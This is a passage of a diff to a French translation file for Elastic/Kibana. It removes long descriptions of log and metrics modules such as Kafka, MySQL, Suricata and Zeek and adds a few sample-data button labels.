- "home.tutorials.iptablesLogs.longDescription": "Il s'agit d'un module pour les logs iptables et ip6tables. Il analyse les logs reçus via le réseau par le biais de Syslog ou d’un fichier. En outre, il comprend le préfixe ajouté par certains pare-feux Ubiquiti qui contient le nom de l'ensemble de règles, le numéro de règle et l'action effectuée sur le trafic (autoriser/refuser). 
[En savoir plus]({learnMoreLink}).",
 "home.tutorials.iptablesLogs.nameTitle": "Logs Iptables",
 "home.tutorials.iptablesLogs.shortDescription": "Collectez et analysez les logs à partir d'iptables et ip6tables avec Filebeat.",
 "home.tutorials.juniperLogs.artifacts.dashboards.linkLabel": "Application Security",
- "home.tutorials.juniperLogs.longDescription": "Ce module permet de recevoir des logs Juniper JUNOS par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.juniperLogs.nameTitle": "Logs Juniper",
 "home.tutorials.juniperLogs.shortDescription": "Collectez et analysez les logs à partir de Juniper JUNOS avec Filebeat.",
 "home.tutorials.kafkaLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Kafka",
- "home.tutorials.kafkaLogs.longDescription": "Le module Filebeat \"kafka\" analyse les logs créés par Kafka. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.kafkaLogs.nameTitle": "Logs Kafka",
 "home.tutorials.kafkaLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Kafka avec Filebeat.",
 "home.tutorials.kafkaMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.kafkaMetrics.longDescription": "Le module Metricbeat \"kafka\" récupère des indicateurs depuis Kafka. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.kafkaMetrics.nameTitle": "Indicateurs Kafka",
 "home.tutorials.kafkaMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Kafka avec Metricbeat.",
 "home.tutorials.kibanaLogs.artifacts.application.label": "Découverte",
- "home.tutorials.kibanaLogs.longDescription": "Il s'agit du module Kibana. 
[En savoir plus]({learnMoreLink}).",
 "home.tutorials.kibanaLogs.nameTitle": "Logs Kibana",
 "home.tutorials.kibanaLogs.shortDescription": "Collectez et analysez les logs à partir de Kibana avec Filebeat.",
 "home.tutorials.kibanaMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.kibanaMetrics.longDescription": "Le module Metricbeat \"kibana\" récupère des indicateurs depuis Kibana. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.kibanaMetrics.nameTitle": "Indicateurs Kibana",
 "home.tutorials.kibanaMetrics.shortDescription": "Collectez les indicateurs à partir de Kibana avec Metricbeat.",
 "home.tutorials.kubernetesMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Kubernetes",
- "home.tutorials.kubernetesMetrics.longDescription": "Le module Metricbeat \"kubernetes\" récupère des indicateurs depuis les API Kubernetes. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.kubernetesMetrics.nameTitle": "Indicateurs Kubernetes",
 "home.tutorials.kubernetesMetrics.shortDescription": "Collectez les indicateurs à partir d'installations Kubernetes avec Metricbeat.",
 "home.tutorials.logstashLogs.artifacts.dashboards.linkLabel": "Logs Logstash",
- "home.tutorials.logstashLogs.longDescription": "Le module analyse les logs standard et le log de requêtes lentes Logstash. Il prend en charge les formats texte brut et JSON. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.logstashLogs.nameTitle": "Logs Logstash",
 "home.tutorials.logstashLogs.shortDescription": "Collectez et analysez les logs principaux et lents à partir de Logstash avec Filebeat.",
 "home.tutorials.logstashMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.logstashMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Logstash. 
[En savoir plus]({learnMoreLink}).",
 "home.tutorials.logstashMetrics.nameTitle": "Indicateurs Logstash",
 "home.tutorials.logstashMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Logstash avec Metricbeat.",
 "home.tutorials.memcachedMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.memcachedMetrics.longDescription": "Le module Metricbeat \"memcached\" récupère des indicateurs depuis Memcached. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.memcachedMetrics.nameTitle": "Indicateurs Memcached",
 "home.tutorials.memcachedMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Memcached avec Metricbeat.",
- "home.tutorials.microsoftLogs.artifacts.dashboards.linkLabel": "Aperçu de Microsoft ATP",
- "home.tutorials.microsoftLogs.longDescription": "Collectez des alertes Microsoft Defender ATP pour les utiliser avec Elastic Security [En savoir plus]({learnMoreLink}).",
- "home.tutorials.microsoftLogs.nameTitle": "Logs Microsoft Defender ATP",
+ "home.tutorials.microsoftLogs.artifacts.dashboards.linkLabel": "Aperçu de Microsoft ATP",
+ "home.tutorials.microsoftLogs.nameTitle": "Logs Microsoft Defender ATP",
 "home.tutorials.microsoftLogs.shortDescription": "Collectez et analysez les alertes à partir de Microsoft Defender ATP avec Filebeat.",
 "home.tutorials.mispLogs.artifacts.dashboards.linkLabel": "Aperçu de MISP",
- "home.tutorials.mispLogs.longDescription": "Il s'agit d'un module Filebeat pour la lecture des informations de Threat Intelligence depuis la plateforme MISP (https://www.circl.lu/doc/misp/). Il utilise l'entrée httpjson pour accéder à l'interface d'API REST MISP. 
[En savoir plus]({learnMoreLink}).",
 "home.tutorials.mispLogs.nameTitle": "Logs Threat Intelligence MISP",
 "home.tutorials.mispLogs.shortDescription": "Collectez et analysez les logs à partir de MISP Threat Intelligence avec Filebeat.",
 "home.tutorials.mongodbLogs.artifacts.dashboards.linkLabel": "Aperçu de MongoDB",
- "home.tutorials.mongodbLogs.longDescription": "Le module collecte et analyse les logs créés par [MongoDB](https://www.mongodb.com/). [En savoir plus]({learnMoreLink}).",
 "home.tutorials.mongodbLogs.nameTitle": "Logs MongoDB",
 "home.tutorials.mongodbLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs MongoDB avec Filebeat.",
 "home.tutorials.mongodbMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs MongoDB",
- "home.tutorials.mongodbMetrics.longDescription": "Le module Metricbeat \"mongodb\" récupère des indicateurs depuis le serveur MongoDB. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.mongodbMetrics.nameTitle": "Indicateurs MongoDB",
 "home.tutorials.mongodbMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs MongoDB avec Metricbeat.",
 "home.tutorials.mssqlLogs.artifacts.application.label": "Découverte",
- "home.tutorials.mssqlLogs.longDescription": "Le module analyse les logs d'erreurs créés par MSSQL. [En savoir plus]({learnMoreLink}).",
- "home.tutorials.mssqlLogs.nameTitle": "Logs Microsoft SQL Server",
+ "home.tutorials.mssqlLogs.nameTitle": "Logs Microsoft SQL Server",
 "home.tutorials.mssqlLogs.shortDescription": "Collectez et analysez les logs à partir d'instances Microsoft SQL Server avec Filebeat.",
- "home.tutorials.mssqlMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Microsoft SQL Server",
- "home.tutorials.mssqlMetrics.longDescription": "Le module Metricbeat \"mssql\" récupère des indicateurs de monitoring, de logs et de performances depuis une instance Microsoft SQL Server. 
[En savoir plus]({learnMoreLink}).",
- "home.tutorials.mssqlMetrics.nameTitle": "Indicateurs Microsoft SQL Server",
+ "home.tutorials.mssqlMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Microsoft SQL Server",
+ "home.tutorials.mssqlMetrics.nameTitle": "Indicateurs Microsoft SQL Server",
 "home.tutorials.mssqlMetrics.shortDescription": "Collectez les indicateurs à partir d'instances Microsoft SQL Server avec Metricbeat.",
 "home.tutorials.muninMetrics.artifacts.application.label": "Découverte",
- "home.tutorials.muninMetrics.longDescription": "Le module Metricbeat \"munin\" récupère des indicateurs depuis Munin. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.muninMetrics.nameTitle": "Indicateurs Munin",
 "home.tutorials.muninMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Munin avec Metricbeat.",
 "home.tutorials.mysqlLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs MySQL",
- "home.tutorials.mysqlLogs.longDescription": "Le module Filebeat \"mysql\" analyse les logs d'erreurs et de requêtes lentes créés par MySQL. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.mysqlLogs.nameTitle": "Logs MySQL",
 "home.tutorials.mysqlLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs MySQL avec Filebeat.",
 "home.tutorials.mysqlMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs MySQL",
- "home.tutorials.mysqlMetrics.longDescription": "Le module Metricbeat \"mysql\" récupère des indicateurs depuis le serveur MySQL. [En savoir plus]({learnMoreLink}).",
 "home.tutorials.mysqlMetrics.nameTitle": "Indicateurs MySQL",
 "home.tutorials.mysqlMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs MySQL avec Metricbeat.",
 "home.tutorials.natsLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs NATS",
- "home.tutorials.natsLogs.longDescription": "Le module Filebeat \"nats\" analyse les logs créés par NATS. 
[En savoir plus]({learnMoreLink}).", - "home.tutorials.natsLogs.nameTitle": "Logs NATS", + "home.tutorials.natsLogs.nameTitle": "Logs NATS", "home.tutorials.natsLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs NATS avec Filebeat.", - "home.tutorials.natsMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs NATS", - "home.tutorials.natsMetrics.longDescription": "Le module Metricbeat \"nats\" récupère des indicateurs depuis NATS. [En savoir plus]({learnMoreLink}).", - "home.tutorials.natsMetrics.nameTitle": "Indicateurs NATS", + "home.tutorials.natsMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs NATS", + "home.tutorials.natsMetrics.nameTitle": "Indicateurs NATS", "home.tutorials.natsMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs NATS avec Metricbeat.", "home.tutorials.netflowLogs.artifacts.dashboards.linkLabel": "Aperçu de Netflow", - "home.tutorials.netflowLogs.longDescription": "Ce module permet de recevoir des enregistrements de flux NetFlow et IPFIX via UDP. Cette entrée prend en charge les versions 1, 5, 6, 7, 8 et 9 de NetFlow ainsi qu'IPFIX. Pour les versions de NetFlow antérieures à la version 9, les champs sont automatiquement mappés vers NetFlow v9. [En savoir plus]({learnMoreLink})", "home.tutorials.netflowLogs.nameTitle": "NetFlow / IPFIX Records", "home.tutorials.netflowLogs.shortDescription": "Collecte les enregistrements de NetFlow et du flux IPFIX avec Filebeat.", "home.tutorials.netscoutLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.netscoutLogs.longDescription": "Ce module permet de recevoir des logs Arbor Peakflow SP par le biais de Syslog ou d'un fichier. 
[En savoir plus]({learnMoreLink}).", - "home.tutorials.netscoutLogs.nameTitle": "Logs Arbor Peakflow", + "home.tutorials.netscoutLogs.nameTitle": "Logs Arbor Peakflow", "home.tutorials.netscoutLogs.shortDescription": "Collectez et analysez les logs à partir de Netscout Arbor Peakflow SP avec Filebeat.", "home.tutorials.nginxLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Nginx", - "home.tutorials.nginxLogs.longDescription": "Le module Filebeat \"nginx\" analyse les logs d'accès et d'erreurs créés par le serveur HTTP Nginx. [En savoir plus]({learnMoreLink}).", "home.tutorials.nginxLogs.nameTitle": "Logs Nginx", "home.tutorials.nginxLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Nginx HTTP avec Filebeat.", - "home.tutorials.nginxMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Nginx", - "home.tutorials.nginxMetrics.longDescription": "Le module Metricbeat \"nginx\" récupère des indicateurs depuis le serveur HTTP Nginx. Le module récupère les données de statut du serveur depuis la page web générée par {statusModuleLink}, qui doit être activé dans votre installation Nginx. [En savoir plus]({learnMoreLink}).", + "home.tutorials.nginxMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Nginx", "home.tutorials.nginxMetrics.nameTitle": "Indicateurs Nginx", "home.tutorials.nginxMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Nginx HTTP avec Metricbeat.", - "home.tutorials.o365Logs.artifacts.dashboards.linkLabel": "Tableau de bord des audits O365", - "home.tutorials.o365Logs.longDescription": "Il s'agit d'un module pour les logs Office 365 reçus via l'un des points de terminaison d'API Office 365. Actuellement, il prend en charge les actions et les événements utilisateur, administrateur, système et de politique depuis les logs d’activité Office 365 et Azure AD exposés par l'API d’activité de gestion Office 365. 
[En savoir plus]({learnMoreLink}).", - "home.tutorials.o365Logs.nameTitle": "Logs Office 365", + "home.tutorials.o365Logs.artifacts.dashboards.linkLabel": "Tableau de bord des audits O365", + "home.tutorials.o365Logs.nameTitle": "Logs Office 365", "home.tutorials.o365Logs.shortDescription": "Collectez et analysez les logs à partir d'Office 365 avec Filebeat.", "home.tutorials.oktaLogs.artifacts.dashboards.linkLabel": "Aperçu d'Okta", - "home.tutorials.oktaLogs.longDescription": "Le module Okta collecte les événements de l'[API Okta](https://developer.okta.com/docs/reference/). Plus précisément, il prend en charge la lecture depuis l'[API de log système Okta](https://developer.okta.com/docs/reference/api/system-log/). [En savoir plus]({learnMoreLink}).", "home.tutorials.oktaLogs.nameTitle": "Logs Okta", "home.tutorials.oktaLogs.shortDescription": "Collectez et analysez les logs à partir de l'API Okta avec Filebeat.", - "home.tutorials.openmetricsMetrics.longDescription": "Le module Metricbeat \"openmetrics\" récupère des indicateurs depuis un point de terminaison fournissant des indicateurs au format OpenMetrics. [En savoir plus]({learnMoreLink}).", "home.tutorials.openmetricsMetrics.nameTitle": "Indicateurs OpenMetrics", "home.tutorials.openmetricsMetrics.shortDescription": "Collectez les indicateurs à partir d'un point de terminaison qui sert des indicateurs au format OpenMetrics avec Metricbeat.", "home.tutorials.oracleMetrics.artifacts.application.label": "Découverte", - "home.tutorials.oracleMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Oracle. 
[En savoir plus]({learnMoreLink}).", "home.tutorials.oracleMetrics.nameTitle": "Indicateurs Oracle", "home.tutorials.oracleMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Oracle avec Metricbeat.", "home.tutorials.osqueryLogs.artifacts.dashboards.linkLabel": "Pack de conformité osquery", - "home.tutorials.osqueryLogs.longDescription": "Le module collecte et décode les logs de résultats écrits par [osqueryd](https://osquery.readthedocs.io/en/latest/introduction/using-osqueryd/) au format JSON. Pour configurer \"osqueryd\", suivez les instructions d'installation d'osquery pour votre système d'exploitation et configurez le pilote de logging \"filesystem\" (celui par défaut). Assurez-vous que les horodatages UTC sont activés. [En savoir plus]({learnMoreLink}).", "home.tutorials.osqueryLogs.nameTitle": "Logs osquery", "home.tutorials.osqueryLogs.shortDescription": "Collectez et analysez les logs à partir d'Osquery avec Filebeat.", "home.tutorials.panwLogs.artifacts.dashboards.linkLabel": "Flux de réseau PANW", - "home.tutorials.panwLogs.longDescription": "Il s'agit d'un module pour les logs de monitoring des pare-feux Palo Alto Networks PAN-OS reçus par le biais de Syslog ou lus depuis un fichier. Actuellement, il prend en charge les messages de type Trafic et Menaces. [En savoir plus]({learnMoreLink}).", - "home.tutorials.panwLogs.nameTitle": "Logs Palo Alto Networks PAN-OS", + "home.tutorials.panwLogs.nameTitle": "Logs Palo Alto Networks PAN-OS", "home.tutorials.panwLogs.shortDescription": "Collectez et analysez les logs de menaces et de trafic à partir de Palo Alto Networks PAN-OS avec Filebeat.", - "home.tutorials.phpFpmMetrics.longDescription": "Le module Metricbeat \"php_fpm\" récupère des indicateurs depuis le serveur PHP-FPM. 
[En savoir plus]({learnMoreLink}).", "home.tutorials.phpFpmMetrics.nameTitle": "Indicateurs PHP-FPM", "home.tutorials.phpFpmMetrics.shortDescription": "Collectez les indicateurs à partir de PHP-FPM avec Metricbeat.", "home.tutorials.postgresqlLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs PostgreSQL", - "home.tutorials.postgresqlLogs.longDescription": "Le module Filebeat \"postgresql\" analyse les logs d'erreurs et de requêtes lentes créés par PostgreSQL. [En savoir plus]({learnMoreLink}).", "home.tutorials.postgresqlLogs.nameTitle": "Logs PostgreSQL", "home.tutorials.postgresqlLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs PostgreSQL avec Filebeat.", - "home.tutorials.postgresqlMetrics.longDescription": "Le module Metricbeat \"postgresql\" récupère des indicateurs depuis le serveur PostgreSQL. [En savoir plus]({learnMoreLink}).", "home.tutorials.postgresqlMetrics.nameTitle": "Indicateurs PostgreSQL", "home.tutorials.postgresqlMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs PostgreSQL avec Metricbeat.", "home.tutorials.prometheusMetrics.artifacts.application.label": "Découverte", - "home.tutorials.prometheusMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis le point de terminaison Prometheus. [En savoir plus]({learnMoreLink}).", "home.tutorials.prometheusMetrics.nameTitle": "Indicateurs Prometheus", "home.tutorials.prometheusMetrics.shortDescription": "Collectez les indicateurs à partir d'exportateurs Prometheus avec Metricbeat.", "home.tutorials.rabbitmqLogs.artifacts.application.label": "Découverte", - "home.tutorials.rabbitmqLogs.longDescription": "Ce module permet d'analyser les [fichiers log RabbitMQ](https://www.rabbitmq.com/logging.html). 
[En savoir plus]({learnMoreLink}).", "home.tutorials.rabbitmqLogs.nameTitle": "Logs RabbitMQ", "home.tutorials.rabbitmqLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs RabbitMQ avec Filebeat.", "home.tutorials.rabbitmqMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs RabbitMQ", - "home.tutorials.rabbitmqMetrics.longDescription": "Le module Metricbeat \"rabbitmq\" récupère des indicateurs depuis le serveur RabbitMQ. [En savoir plus]({learnMoreLink}).", "home.tutorials.rabbitmqMetrics.nameTitle": "Indicateurs RabbitMQ", "home.tutorials.rabbitmqMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs RabbitMQ avec Metricbeat.", "home.tutorials.radwareLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.radwareLogs.longDescription": "Ce module permet de recevoir des logs Radware DefensePro par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.radwareLogs.nameTitle": "Logs Radware DefensePro", "home.tutorials.radwareLogs.shortDescription": "Collectez et analysez les logs à partir de Radware DefensePro avec Filebeat.", "home.tutorials.redisenterpriseMetrics.artifacts.application.label": "Découverte", - "home.tutorials.redisenterpriseMetrics.longDescription": "Le module Metricbeat \"redisenterprise\" récupère des indicateurs depuis le serveur Redis Enterprise. [En savoir plus]({learnMoreLink}).", - "home.tutorials.redisenterpriseMetrics.nameTitle": "Indicateurs Redis Enterprise", + "home.tutorials.redisenterpriseMetrics.nameTitle": "Indicateurs Redis Enterprise", "home.tutorials.redisenterpriseMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Redis Enterprise avec Metricbeat.", "home.tutorials.redisLogs.artifacts.dashboards.linkLabel": "Tableau de bord des logs Redis", - "home.tutorials.redisLogs.longDescription": "Le module Filebeat \"redis\" analyse les logs d'erreurs et de requêtes lentes créés par Redis. 
Pour que Redis écrive des logs d'erreurs, assurez-vous que l'option \"logfile\" est définie sur \"redis-server.log\" dans le fichier de configuration Redis. Les logs de requêtes lentes sont lus directement depuis Redis via la commande \"SLOWLOG\". Pour que Redis enregistre des logs de requêtes lentes, assurez-vous que l'option \"slowlog-log-slower-than\" est activée. Notez que l'ensemble de fichiers \"slowlog\" est expérimental. [En savoir plus]({learnMoreLink}).", "home.tutorials.redisLogs.nameTitle": "Logs Redis", "home.tutorials.redisLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Redis avec Filebeat.", "home.tutorials.redisMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Redis", - "home.tutorials.redisMetrics.longDescription": "Le module Metricbeat \"redis\" récupère des indicateurs depuis le serveur Redis. [En savoir plus]({learnMoreLink}).", "home.tutorials.redisMetrics.nameTitle": "Indicateurs Redis", "home.tutorials.redisMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Redis avec Metricbeat.", "home.tutorials.santaLogs.artifacts.dashboards.linkLabel": "Aperçu de Santa", - "home.tutorials.santaLogs.longDescription": "Le module collecte et analyse les logs de [Google Santa](https://github.com/google/santa), un outil de sécurité pour macOS qui monitore les exécutions de processus et est capable de mettre en liste noire/blanche des fichiers binaires. [En savoir plus]({learnMoreLink}).", - "home.tutorials.santaLogs.nameTitle": "Logs Google Santa", + "home.tutorials.santaLogs.nameTitle": "Logs Google Santa", "home.tutorials.santaLogs.shortDescription": "Collectez et analysez les logs à partir de systèmes Google Santa avec Filebeat.", - "home.tutorials.sonicwallLogs.longDescription": "Ce module permet de recevoir des logs Sonicwall FW par le biais de Syslog ou d'un fichier. 
[En savoir plus]({learnMoreLink}).", - "home.tutorials.sonicwallLogs.nameTitle": "Logs Sonicwall FW", + "home.tutorials.sonicwallLogs.nameTitle": "Logs Sonicwall FW", "home.tutorials.sonicwallLogs.shortDescription": "Collectez et analysez les logs à partir de Sonicwall-FW avec Filebeat.", "home.tutorials.sophosLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.sophosLogs.longDescription": "Il s'agit d'un module pour les produits Sophos. Actuellement, il prend en charge les logs XG SFOS envoyés au format Syslog. [En savoir plus]({learnMoreLink}).", "home.tutorials.sophosLogs.nameTitle": "Logs Sophos", "home.tutorials.sophosLogs.shortDescription": "Collectez et analysez les logs à partir de Sophos XG SFOS avec Filebeat.", "home.tutorials.squidLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.squidLogs.longDescription": "Ce module permet de recevoir des logs Squid par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.squidLogs.nameTitle": "Logs Squid", "home.tutorials.squidLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Squid avec Filebeat.", - "home.tutorials.stanMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Stan", - "home.tutorials.stanMetrics.longDescription": "Le module Metricbeat \"stan\" récupère des indicateurs depuis STAN. [En savoir plus]({learnMoreLink}).", + "home.tutorials.stanMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs Stan", "home.tutorials.stanMetrics.nameTitle": "Indicateurs STAN", "home.tutorials.stanMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs STAN avec Metricbeat.", - "home.tutorials.statsdMetrics.longDescription": "Le module Metricbeat \"statsd\" récupère des indicateurs depuis statsd. 
[En savoir plus]({learnMoreLink}).", "home.tutorials.statsdMetrics.nameTitle": "Indicateurs statsd", "home.tutorials.statsdMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Statsd avec Metricbeat.", "home.tutorials.suricataLogs.artifacts.dashboards.linkLabel": "Aperçu des événements Suricata", - "home.tutorials.suricataLogs.longDescription": "Il s'agit d'un module pour le log IDS/IPS/NSM Suricata. Il analyse les logs qui sont au [format JSON Suricata Eve](https://suricata.readthedocs.io/en/latest/output/eve/eve-json-format.html). [En savoir plus]({learnMoreLink}).", "home.tutorials.suricataLogs.nameTitle": "Logs Suricata", "home.tutorials.suricataLogs.shortDescription": "Collectez et analysez les logs à partir de Suricata IDS/IPS/NSM avec Filebeat.", "home.tutorials.systemLogs.artifacts.dashboards.linkLabel": "Tableau de bord Syslog système", - "home.tutorials.systemLogs.longDescription": "Le module collecte et analyse les logs créés par le service de logging système des distributions basées sur Unix/Linux communes. [En savoir plus]({learnMoreLink}).", "home.tutorials.systemLogs.nameTitle": "Logs système", "home.tutorials.systemLogs.shortDescription": "Collectez des logs système des distributions basées sur Unix/Linux communes.", "home.tutorials.systemMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs système", - "home.tutorials.systemMetrics.longDescription": "Le module Metricbeat \"system\" collecte des statistiques relatives au CPU, à la mémoire, au réseau et au disque depuis l'hôte. Il collecte des statistiques au niveau du système et des statistiques par processus et système de fichiers. 
[En savoir plus]({learnMoreLink}).", "home.tutorials.systemMetrics.nameTitle": "Indicateurs système", "home.tutorials.systemMetrics.shortDescription": "Collectez les indicateurs de CPU, de mémoire, de réseau et de disque à partir des hôtes System avec Metricbeat.", "home.tutorials.tomcatLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.tomcatLogs.longDescription": "Ce module permet de recevoir des logs Apache Tomcat par le biais de Syslog ou d'un fichier. [En savoir plus]({learnMoreLink}).", "home.tutorials.tomcatLogs.nameTitle": "Logs Tomcat", "home.tutorials.tomcatLogs.shortDescription": "Collectez et analysez les logs à partir de serveurs Apache Tomcat avec Filebeat.", "home.tutorials.traefikLogs.artifacts.dashboards.linkLabel": "Logs d'accès Traefik", - "home.tutorials.traefikLogs.longDescription": "Le module analyse les logs d'accès créés par [Traefik](https://traefik.io/). [En savoir plus]({learnMoreLink}).", "home.tutorials.traefikLogs.nameTitle": "Logs Traefik", "home.tutorials.traefikLogs.shortDescription": "Collectez et analysez les logs à partir de Traefik avec Filebeat.", - "home.tutorials.traefikMetrics.longDescription": "Le module Metricbeat \"traefik\" récupère des indicateurs depuis Traefik. [En savoir plus]({learnMoreLink}).", "home.tutorials.traefikMetrics.nameTitle": "Indicateurs Traefik", "home.tutorials.traefikMetrics.shortDescription": "Collectez les indicateurs à partir de Traefik avec Metricbeat.", "home.tutorials.uptimeMonitors.artifacts.dashboards.linkLabel": "Application Uptime", - "home.tutorials.uptimeMonitors.longDescription": "Monitorez la disponibilité des services grâce à une détection active. À partir d'une liste d'URL, Heartbeat pose cette question toute simple : Êtes-vous actif ? 
[En savoir plus]({learnMoreLink}).", "home.tutorials.uptimeMonitors.nameTitle": "Monitorings Uptime", "home.tutorials.uptimeMonitors.shortDescription": "Surveillez la disponibilité des services avec Heartbeat.", - "home.tutorials.uwsgiMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs uWSGI", - "home.tutorials.uwsgiMetrics.longDescription": "Le module Metricbeat \"uwsgi\" récupère des indicateurs depuis le serveur uWSGI. [En savoir plus]({learnMoreLink}).", + "home.tutorials.uwsgiMetrics.artifacts.dashboards.linkLabel": "Tableau de bord des indicateurs uWSGI", "home.tutorials.uwsgiMetrics.nameTitle": "Indicateurs uWSGI", "home.tutorials.uwsgiMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs uWSGI avec Metricbeat.", "home.tutorials.vsphereMetrics.artifacts.application.label": "Découverte", - "home.tutorials.vsphereMetrics.longDescription": "Le module Metricbeat \"vsphere\" récupère des indicateurs depuis un cluster vSphere. [En savoir plus]({learnMoreLink}).", "home.tutorials.vsphereMetrics.nameTitle": "Indicateurs vSphere", "home.tutorials.vsphereMetrics.shortDescription": "Collectez les indicateurs à partir de vSphere avec Metricbeat.", "home.tutorials.windowsEventLogs.artifacts.application.label": "Application SIEM", - "home.tutorials.windowsEventLogs.longDescription": "Utilisez Winlogbeat pour collecter des logs depuis le log des événements Windows. [En savoir plus]({learnMoreLink}).", "home.tutorials.windowsEventLogs.nameTitle": "Logs des événements Windows", "home.tutorials.windowsEventLogs.shortDescription": "Collectez et analysez les logs à partir de Windows Event Logs avec WinLogBeat.", "home.tutorials.windowsMetrics.artifacts.application.label": "Découverte", - "home.tutorials.windowsMetrics.longDescription": "Le module Metricbeat \"windows\" récupère des indicateurs depuis Windows. 
[En savoir plus]({learnMoreLink}).", "home.tutorials.windowsMetrics.nameTitle": "Indicateurs Windows", "home.tutorials.windowsMetrics.shortDescription": "Collectez les indicateurs à partir de Windows avec Metricbeat.", "home.tutorials.zeekLogs.artifacts.dashboards.linkLabel": "Aperçu de Zeek", - "home.tutorials.zeekLogs.longDescription": "Il s'agit d'un module pour Zeek, anciennement appelé Bro. Il analyse les logs qui sont au [format JSON Zeek](https://www.zeek.org/manual/release/logs/index.html). [En savoir plus]({learnMoreLink}).", "home.tutorials.zeekLogs.nameTitle": "Logs Zeek", "home.tutorials.zeekLogs.shortDescription": "Collectez et analysez les logs à partir de la sécurité réseau Zeek avec Filebeat.", "home.tutorials.zookeeperMetrics.artifacts.application.label": "Découverte", - "home.tutorials.zookeeperMetrics.longDescription": "Le module Metricbeat \"{moduleName}\" récupère des indicateurs depuis un serveur Zookeeper. [En savoir plus]({learnMoreLink}).", "home.tutorials.zookeeperMetrics.nameTitle": "Indicateurs Zookeeper", "home.tutorials.zookeeperMetrics.shortDescription": "Collectez les indicateurs à partir de serveurs Zookeeper avec Metricbeat.", "home.tutorials.zscalerLogs.artifacts.dashboards.linkLabel": "Application Security", - "home.tutorials.zscalerLogs.longDescription": "Ce module permet de recevoir des logs Zscaler NSS par le biais de Syslog ou d'un fichier. 
[En savoir plus]({learnMoreLink}).", "home.tutorials.zscalerLogs.nameTitle": "Logs Zscaler", "home.tutorials.zscalerLogs.shortDescription": "Collectez et analysez les logs à partir de Zscaler NSS avec Filebeat.", "home.welcomeTitle": "Bienvenue dans Elastic", + "homePackages.sampleDataCard.addButtonAriaLabel": "Ajouter {datasetName}", + "homePackages.sampleDataCard.addingButtonAriaLabel": "Ajout de {datasetName}", + "homePackages.sampleDataCard.default.addButtonAriaLabel": "Ajouter {datasetName}", + "homePackages.sampleDataCard.default.unableToVerifyErrorMessage": "Impossible de vérifier le statut de l'ensemble de données. Erreur : {statusMsg}.", + "homePackages.sampleDataCard.removeButtonAriaLabel": "Supprimer {datasetName}", + "homePackages.sampleDataCard.removingButtonAriaLabel": "Suppression de {datasetName}", + "homePackages.sampleDataCard.viewDataButtonAriaLabel": "Consulter {datasetName}", "homePackages.sampleDataSet.installedLabel": "{name} installé", - "homePackages.sampleDataSet.unableToInstallErrorMessage": "Impossible d'installer l'exemple d’ensemble de données : 